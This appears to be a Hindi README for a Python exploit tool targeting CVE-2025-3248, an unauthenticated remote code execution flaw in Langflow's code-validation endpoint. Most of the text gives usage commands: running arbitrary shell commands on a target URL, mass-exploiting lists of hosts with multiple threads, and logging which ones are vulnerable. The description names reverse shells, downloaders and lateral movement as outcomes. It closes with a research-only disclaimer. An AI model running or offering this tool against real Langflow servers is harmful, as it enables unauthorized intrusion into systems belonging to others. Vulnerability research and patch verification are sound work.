
Langflow, उपयोगकर्ता द्वारा प्रस्तुत "सत्यापन कोड" का AST पार्सिंग और संकलन करते समय, प्रमाणीकरण और सैंडबॉक्स प्रतिबंधों के बिना Python के compile()/exec() को कॉल करता है (साथ ही संकलन चरण के दौरान फ़ंक्शन डिफ़ॉल्ट तर्कों और डेकोरेटरों का मूल्यांकन करता है)। हमलावर दुर्भावनापूर्ण पेलोड को डिफ़ॉल्ट तर्क मानों या डेकोरेटरों में रख सकता है, और इसके माध्यम से सर्वर संदर्भ में मनमाने कथन निष्पादित कर सकता है (रिवर्स शेल, डाउनलोडर, लेटरल मूवमेंट, आदि)।
CVE-2025-3248 भेद्यता को स्कैन करने और उसका शोषण करने के लिए एक Python टूल, जो Langflow अनुप्रयोगों में रिमोट कोड निष्पादन (RCE) की अनुमति देता है।
pip install requests
python cve-2025-3248.py http://target:port
python cve-2025-3248.py http://target:port -c "id"
python cve-2025-3248.py -f urls.txt
python cve-2025-3248.py -f urls.txt -c "whoami"
python cve-2025-3248.py -f urls.txt -t 20 --timeout 15 -v
url: लक्ष्य URL (उदाहरण: http://10.10.10.1:7860)-f, --file: URL सूची वाली फ़ाइल, प्रत्येक पंक्ति में एक URL-c, --cmd: निष्पादित करने के लिए कमांड (उदाहरण: id, whoami)--timeout: अनुरोध टाइमआउट, डिफ़ॉल्ट 10 सेकंड-t, --threads: बैच स्कैनिंग के लिए थ्रेड्स की संख्या, डिफ़ॉल्ट 10-v, --verbose: विस्तृत मोड, मूल प्रतिक्रिया दिखाता हैpython cve-2025-3248.py http://192.168.1.100:7860
python cve-2025-3248.py http://192.168.1.100:7860 -c "ls -la"
फ़ाइल targets.txt बनाएँ:
http://192.168.1.100:7860
http://192.168.1.101:7860
http://192.168.1.102:7860
फिर चलाएँ:
python cve-2025-3248.py -f targets.txt
python cve-2025-3248.py -f targets.txt -c "uname -a" -t 5
[+] सफल निष्पादन[-] विफलता या त्रुटि[!] चेतावनी संदेश[*] सूचना आउटपुटसफलतापूर्वक स्कैन किए गए लक्ष्य vulnerable_targets.txt या vulnerable_targets_{command}.txt फ़ाइल में सहेजे जाते हैं।
यह टूल केवल सुरक्षा अनुसंधान और शैक्षिक उद्देश्यों के लिए है। उपयोगकर्ता अपने उपयोग व्यवहार के लिए जिम्मेदार है। बिना प्राधिकरण के सिस्टम का परीक्षण करना कानूनों और विनियमों का उल्लंघन कर सकता है।